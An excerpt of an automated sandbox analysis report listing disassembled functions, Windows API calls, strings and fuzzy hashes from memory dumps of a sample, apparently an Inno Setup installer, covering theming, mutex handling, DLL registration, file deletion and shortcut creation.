                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CryptFour
                                                              • String ID:
                                                              • API String ID: 2153018856-0
                                                              • Opcode ID: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                              • Instruction ID: 227689971defb3a768f182aa15824e3680876923b4d994b81e1676941902ce31
                                                              • Opcode Fuzzy Hash: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                              • Instruction Fuzzy Hash: 9DA002B0A80300BAFD2057B05D4EF26352CA7D0F05F708465B202EA0D085A56410852C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2965937895.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000001.00000002.2965911768.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000001.00000002.2965954688.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_10000000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                              • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                              • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                              • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2965937895.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000001.00000002.2965911768.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000001.00000002.2965954688.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_10000000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                              • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                              • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                              • Instruction Fuzzy Hash:
                                                              APIs
                                                                • Part of subcall function 0044B614: GetVersionExA.KERNEL32(00000094), ref: 0044B631
                                                              • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
                                                              • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
                                                              • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6DD
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6EF
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B701
                                                              • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B713
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B725
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B737
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B749
                                                              • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B75B
                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B76D
                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B77F
                                                              • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B791
                                                              • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B7A3
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7B5
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7C7
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7D9
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7EB
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7FD
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B80F
                                                              • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B821
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B833
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B845
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B857
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B869
                                                              • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B87B
                                                              • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B88D
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B89F
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8B1
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8C3
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8D5
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8E7
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8F9
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B90B
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B91D
                                                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B92F
                                                              • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B941
                                                              • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B953
                                                              • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B965
                                                              • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B977
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B989
                                                              • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B99B
                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B9AD
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9BF
                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9D1
                                                              • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoadVersion
                                                              • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                              • API String ID: 1968650500-2910565190
                                                              • Opcode ID: 0c8e19753f2f8210615bc5a5f26c821a667ede831694cf2c59d6b62027e60e29
                                                              • Instruction ID: 346aa6b979044c2d6f95573bc57da9b6801dc261a15d858c7a91061cf3dc2738
                                                              • Opcode Fuzzy Hash: 0c8e19753f2f8210615bc5a5f26c821a667ede831694cf2c59d6b62027e60e29
                                                              • Instruction Fuzzy Hash: CC91E7B0A40B50EBEF00EBF5ADC6A2637A8EB15B14714467BB444EF295D778D800CF99
                                                              APIs
                                                              • CreateMutexA.KERNEL32(00499B18,00000001,00000000,00000000,004584B9,?,?,?,00000001,?,004586D3,00000000,004586E9,?,00000000,0049B628), ref: 004581D1
                                                              • CreateFileMappingA.KERNEL32(000000FF,00499B18,00000004,00000000,00002018,00000000), ref: 00458209
                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045848F,?,00499B18,00000001,00000000,00000000,004584B9,?,?,?), ref: 00458230
                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045833D
                                                              • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045848F,?,00499B18,00000001,00000000,00000000,004584B9), ref: 00458295
                                                                • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                              • CloseHandle.KERNEL32(004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458354
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045838D
                                                              • GetLastError.KERNEL32(00000000,000000FF,004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045839F
                                                              • UnmapViewOfFile.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458471
                                                              • CloseHandle.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458480
                                                              • CloseHandle.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458489
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                              • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                              • API String ID: 4012871263-351310198
                                                              • Opcode ID: cc7ad6ccf5233eaebe813f6a5333062681ccb791baa3dad4f168156cebafbadf
                                                              • Instruction ID: 29107a7cf73729034b65a1fcaaf08eab05738b19563c620e852bf3134b102344
                                                              • Opcode Fuzzy Hash: cc7ad6ccf5233eaebe813f6a5333062681ccb791baa3dad4f168156cebafbadf
                                                              • Instruction Fuzzy Hash: 46914170A002099BDB10EFA9C845B9EB7B4EB05305F50856FED14FB283DF7899498F69
                                                              APIs
                                                              • 73A1A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
                                                              • 73A24C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
                                                              • 73A26180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
                                                              • 73A24C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
                                                              • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                              • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                              • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                              • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                              • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                              • 73A24C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                              • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
                                                              • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
                                                              • 73A18830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
                                                              • 73A122A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                              • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                              • 73A24D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
                                                              • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                              • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                                • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Color$ObjectSelect$A122A18830Text$A26180A570DeleteFillRect
                                                              • String ID:
                                                              • API String ID: 1381628555-0
                                                              • Opcode ID: adf6567a18e9830f1830aa63917bca934ba6755201e08534c76e5c919bac5cde
                                                              • Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
                                                              • Opcode Fuzzy Hash: adf6567a18e9830f1830aa63917bca934ba6755201e08534c76e5c919bac5cde
                                                              • Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
                                                              APIs
                                                              • ShowWindow.USER32(?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000,?,004984EF,00000000,004984F9,?,00000000), ref: 00497E23
                                                              • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000,?,004984EF,00000000), ref: 00497E36
                                                              • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000), ref: 00497E46
                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00497E67
                                                              • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000), ref: 00497E77
                                                                • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,0045606A,00000000,004560D2), ref: 0042D491
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                              • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                              • API String ID: 2000705611-3672972446
                                                              • Opcode ID: 082597774f549eda738f03d74d98f9d52f67cfbc56a945ed8bd031ee0c63b3f6
                                                              • Instruction ID: d71e95358f961f9c8085103628ed7ebfe7aaf39cab9d6a0a027eda6f41515cae
                                                              • Opcode Fuzzy Hash: 082597774f549eda738f03d74d98f9d52f67cfbc56a945ed8bd031ee0c63b3f6
                                                              • Instruction Fuzzy Hash: C291B530A042449FDF11EBA9DC52BAE7FA4EF4A304F51447BF500AB292DA7DAC05CB59
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,0045ACF8,?,?,?,?,?,00000006,?,00000000,0049722D,?,00000000,004972D0), ref: 0045ABAA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                              • API String ID: 1452528299-3112430753
                                                              • Opcode ID: c66920e5c30c99cf277918279cba3cc6becf5feca79c3c8df3d973bfdf2d3f66
                                                              • Instruction ID: f5e388fb48f96f1c0466849e1c52bdf0d536658550fb6e74c3a20cf80cd44526
                                                              • Opcode Fuzzy Hash: c66920e5c30c99cf277918279cba3cc6becf5feca79c3c8df3d973bfdf2d3f66
                                                              • Instruction Fuzzy Hash: 2271AE707002445BDB01EB69D8427AE77A6AF48316F50856BFC01DB383CA7C9A5DC79A
                                                              APIs
                                                              • GetVersion.KERNEL32 ref: 0045CF3E
                                                              • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CF5E
                                                              • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CF6B
                                                              • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CF78
                                                              • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CF86
                                                                • Part of subcall function 0045CE2C: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CECB,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CEA5
                                                              • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D179,?,?,00000000), ref: 0045D03F
                                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D179,?,?,00000000), ref: 0045D048
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                              • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                              • API String ID: 59345061-4263478283
                                                              • Opcode ID: 0692e2fed8a1faf7364eaae3f9f0a99faa4aa2306d0b5476e4b0968c8b8ae958
                                                              • Instruction ID: 4ce31bb81caf279f5ed3d10c62bb09a2aad5f6c7ba3f26a8019cd68bbbdcec0a
                                                              • Opcode Fuzzy Hash: 0692e2fed8a1faf7364eaae3f9f0a99faa4aa2306d0b5476e4b0968c8b8ae958
                                                              • Instruction Fuzzy Hash: E95193B1D00608EFDB10DFA9C845BAEBBB8EF48315F14806AF915B7381C2389945CF69
                                                              APIs
                                                              • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,0045688D), ref: 00456592
                                                              • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,0045688D), ref: 004565B8
                                                              • SysFreeString.OLEAUT32(?), ref: 00456745
                                                              Strings
                                                              • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566DB
                                                              • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 004567B6
                                                              • IPersistFile::Save, xrefs: 00456814
                                                              • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 0045672A
                                                              • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 0045677C
                                                              • CoCreateInstance, xrefs: 004565C3
                                                              • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004566A7
                                                              • IPropertyStore::Commit, xrefs: 00456795
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CreateInstance$FreeString
                                                              • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                              • API String ID: 308859552-3936712486
                                                              • Opcode ID: 7d0cfd58331e70c95d7e52b395728c42337191576a3ec6130da080a3535e9fef
                                                              • Instruction ID: c99fdec92309fd26656a6f7ea9bd91ecf5cc306c054acb75a5569a06f28a4b2e
                                                              • Opcode Fuzzy Hash: 7d0cfd58331e70c95d7e52b395728c42337191576a3ec6130da080a3535e9fef
                                                              • Instruction Fuzzy Hash: 29A13E71A00104AFDB50EFA9C885B9E7BF8EF09706F55406AF804E7252DB38DD48CB69
                                                              APIs
                                                              • 73A24C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                              • 73A24C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                              • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                              • 73A26180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
                                                              • 73A1A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                              • 73A24C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                              • 73A1A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                              • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                              • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                              • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                              • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                              • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                              • DeleteDC.GDI32(?), ref: 0041B4E9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Object$Select$Delete$A26180A480A570Stretch
                                                              • String ID:
                                                              • API String ID: 359944910-0
                                                              • Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                              • Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
                                                              • Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                              • Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
                                                              APIs
                                                                • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
